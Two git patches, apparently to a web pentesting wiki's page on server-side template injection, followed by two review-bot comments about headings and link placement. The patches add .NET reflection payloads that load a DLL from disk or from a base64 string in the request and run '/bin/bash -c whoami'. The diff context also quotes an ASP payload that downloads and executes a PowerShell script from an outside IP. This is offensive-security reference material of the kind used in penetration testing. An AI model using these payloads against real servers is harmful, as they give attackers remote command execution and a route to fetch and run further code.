From 6e063f6cff64484c3fd3a7454175e00f701a10a2 Mon Sep 17 00:00:00 2001 From: cyberzs Date: Sat, 22 Feb 2025 11:30:26 +0100 Subject: [PATCH 1/2] SSTI .NET techniques Added techniques for bypassing restrictions in .NET templates with use of reflection mechanisms. --- .../README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index 648ca7da6..db4c32fd1 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md 
@@ -1020,6 +1020,25 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %> ``` +### .Net Bypassing restrictions + +The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects. + +Dll's can be loaded with: + +- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?"))}` - from filesystem. +- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("Load", [typeof(byte[])]).Invoke(null, [Convert.FromBase64String("Base64EncodedDll")])}` - directly from request. + +Full command execution: + +``` +{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?")).GetType("System.Diagnostics.Process").GetMethods().GetValue(0).Invoke(null, "/bin/bash,-c ""whoami""".Split(","))} +``` + +**More Information** + +- [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/) + **More Information** - [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp) From 92e577808990e001f5f497d24a6e638f6d0526a6 Mon Sep 17 00:00:00 2001 From: cyberzs Date: Sat, 22 Feb 2025 11:33:40 +0100 Subject: [PATCH 2/2] Fix wrong placement of text --- .../ssti-server-side-template-injection/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index db4c32fd1..fab420745 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md 
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md @@ -1020,6 +1020,10 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %> ``` +**More Information** + +- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp) + ### .Net Bypassing restrictions The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects. @@ -1039,10 +1043,6 @@ Full command execution: - [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/) -**More Information** - -- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp) - ### Mojolicious (Perl) Even if it's perl it uses tags like ERB in Ruby.
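Review bot: in the PATCH 1/2 hunk the new section's `**More Information**` list is inserted directly above the existing ASP `**More Information**` list, leaving two identical headings back to back, and PATCH 2/2 exists only to undo that; squash the two commits before merge so the history does not carry the broken intermediate state. In the same hunk, the heading `### .Net Bypassing restrictions` should use the `.NET` spelling the surrounding text already uses, `DLL's` and `Dll's` should be `DLLs`, and the `Full command execution` fence carries no language tag. The section should also say which template engine or expression context the `{ ... }` delimited payloads apply to, since the examples just above it use `<%= ... %>` ASP syntax, and the `efigo.pl` link under `**More Information**` needs a one-line description of what CVE-2024-9150 is so the reference is useful without following it.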
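Review bot: the PATCH 2/2 hunk at `@@ -1020,6 +1020,10` moves the ASP `**More Information**` list above `### .Net Bypassing restrictions`, which fixes the placement, but the net result is still two `**More Information**` blocks a few lines apart inside the same .NET material; consider folding the `efigo.pl` link into the existing list with a short note that it covers the reflection technique, or giving the second block a title that ties it to the bypass subsection, so readers do not read it as a pasted duplicate.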